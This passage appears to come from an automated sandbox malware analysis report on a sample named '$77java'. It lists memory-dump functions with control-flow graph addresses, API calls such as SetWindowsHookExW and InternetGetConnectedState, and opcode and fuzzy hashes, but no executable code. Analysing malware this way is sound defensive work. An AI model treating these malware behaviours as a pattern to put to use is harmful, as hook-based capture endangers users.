                                                      control_flow_graph 278 7ffd3468a188-7ffd3468a18f 279 7ffd3468a19a-7ffd3468a20d 278->279 280 7ffd3468a191-7ffd3468a199 278->280 284 7ffd3468a299-7ffd3468a29d 279->284 285 7ffd3468a213-7ffd3468a220 279->285 280->279 286 7ffd3468a222-7ffd3468a25f SetWindowsHookExW 284->286 285->286 288 7ffd3468a267-7ffd3468a298 286->288 289 7ffd3468a261 286->289 289->288
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.3393134615.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd34680000_$77java.jbxd
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: a6cf6c5c2147822b9a3168ba1f00461b980a61aec87b1dc5d1000ca82bd03ab0
                                                      • Instruction ID: fe8075502e9302ba6a945a2f07b859f36d6b5cbb49b751855b482d27df5abadb
                                                      • Opcode Fuzzy Hash: a6cf6c5c2147822b9a3168ba1f00461b980a61aec87b1dc5d1000ca82bd03ab0
                                                      • Instruction Fuzzy Hash: B3412A30A1CA5C4FEB59DFAC98566F9BBE1EB59321F04027ED049D3192CE756812C7C1
                                                      Function 00007FFD34686820 Relevance: 1.6, APIs: 1, Instructions: 114networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 292 7ffd34686820-7ffd34686827 293 7ffd34686832-7ffd3468683a 292->293 294 7ffd34686829-7ffd34686831 292->294 295 7ffd34686870-7ffd346868d1 InternetGetConnectedState 293->295 296 7ffd3468683c-7ffd3468686c 293->296 294->293 299 7ffd346868d3 295->299 300 7ffd346868d9-7ffd34686900 295->300 296->295 299->300
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.3393134615.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd34680000_$77java.jbxd
                                                      Similarity
                                                      • API ID: ConnectedInternetState
                                                      • String ID:
                                                      • API String ID: 97057780-0
                                                      • Opcode ID: 3bbe94008a5b85540e7eb1d77355db0ed0d3b7d880b36fd536d450861e83d5c8
                                                      • Instruction ID: 78f0789aa267eb67ca6d487e5b8ba3849f77449740d9a317bcda448b9045f142
                                                      • Opcode Fuzzy Hash: 3bbe94008a5b85540e7eb1d77355db0ed0d3b7d880b36fd536d450861e83d5c8
                                                      • Instruction Fuzzy Hash: 80310171A0C61C8FEB58DFA8D8857E97BE0EB56320F04416FD04DD3192CB24A856CB91

                                                      Executed Functions

                                                      Function 00007FFD34690A35 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: cBL_^
                                                      • API String ID: 0-1749287841
                                                      • Opcode ID: f253a7a5156928a065ca57cb357efd836d8aa0dbf15103bd97878480c2936a8a
                                                      • Instruction ID: dea64b46c7ef5dbc0657999082ba9fe03e4217e00c4b7a93bd232fa1eae9b754
                                                      • Opcode Fuzzy Hash: f253a7a5156928a065ca57cb357efd836d8aa0dbf15103bd97878480c2936a8a
                                                      • Instruction Fuzzy Hash: 7151A121F1DE664AFBA5BB6880B63F932D0EF56305F4000BAE14ED31D7CEAD68419391
                                                      Function 00007FFD34690CD6 Relevance: .3, Instructions: 293COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8db4c7a9b856ed0b4df014ec97e757e5ed85d934ca872bf0ce714f27a8f42e5c
                                                      • Instruction ID: 52d831df9b15a2d584b2abc8e2fc0c55b9f4a25a950f6bc5d67f83e00a7be933
                                                      • Opcode Fuzzy Hash: 8db4c7a9b856ed0b4df014ec97e757e5ed85d934ca872bf0ce714f27a8f42e5c
                                                      • Instruction Fuzzy Hash: 5391E521B1DA994FE7A2F7B884796A53BE1EF4A21174500FAE44DCB2A3DD6C9C02C741
                                                      Function 00007FFD34690FCE Relevance: .2, Instructions: 244COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 681a9b6847563dc31186a5aed63fd2a7099069799648a626b09540dbc14a7f2b
                                                      • Instruction ID: 538304940589e1a1bf5bd996418bad740dbdcb21d90f2080f4571a1c4ae500ef
                                                      • Opcode Fuzzy Hash: 681a9b6847563dc31186a5aed63fd2a7099069799648a626b09540dbc14a7f2b
                                                      • Instruction Fuzzy Hash: 6B71A631B0C9995FEB85EB6CD4A57E87BE1EF9A310F1401BAD04DC3293CD69A8428751
                                                      Function 00007FFD346904D8 Relevance: .2, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e91e492bdb7b49166a4b353b02ef3514d06fb0ea001a5e631c2ce11a68068606
                                                      • Instruction ID: 764846954449d9d711013d2b660c5836c0b97937a439459b60b3ac3c9b4d69f8
                                                      • Opcode Fuzzy Hash: e91e492bdb7b49166a4b353b02ef3514d06fb0ea001a5e631c2ce11a68068606
                                                      • Instruction Fuzzy Hash: 01618031B189599FEB98EB5CD4A5BED7BE1FF99310F140179E04EC3292CE68AC428741
                                                      Function 00007FFD34690808 Relevance: .2, Instructions: 172COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 617b0430ffe846bbf321bce5ab210977cfab8fdf57bd874aca5c661f749aabd2
                                                      • Instruction ID: c11ae67d78542458d0e6327c14c788806e3342632629709ca14d3876ba9099e7
                                                      • Opcode Fuzzy Hash: 617b0430ffe846bbf321bce5ab210977cfab8fdf57bd874aca5c661f749aabd2
                                                      • Instruction Fuzzy Hash: BB41B120B08B9E8FDB95FB98C4A12E97BF1FF99304B9080B5D44DD3787DA286901C791
                                                      Function 00007FFD34691431 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 094824dd767b58c528b2d22bc0a15eaf04193a729eaa6306c261bc3ed4e51c36
                                                      • Instruction ID: d5608b03c798a9784fc5cdd2ae151ab181398f13322cbd1a5d0e3a543fb5ee3b
                                                      • Opcode Fuzzy Hash: 094824dd767b58c528b2d22bc0a15eaf04193a729eaa6306c261bc3ed4e51c36
                                                      • Instruction Fuzzy Hash: C5012D21A0C7A51FF345AF2458B64F13FD4DB96764B1845BBE48CC71E3D84D55838392
                                                      Function 00007FFD34691258 Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2210318370.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffd34690000_$77java.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7798ef91e82d4fc2d5865734bb00287c98945f5eed30a7ef752e22f3c900ff49
                                                      • Instruction ID: 23a45fb703a77e3e5545c8c584db24e349c9945fea03258e85b4e51c6426199b
                                                      • Opcode Fuzzy Hash: 7798ef91e82d4fc2d5865734bb00287c98945f5eed30a7ef752e22f3c900ff49
                                                      • Instruction Fuzzy Hash: ECE0687390DA0C1EEA18E91DAC06DE63FD8EBC7238F00005FE48DC2052E0527563C351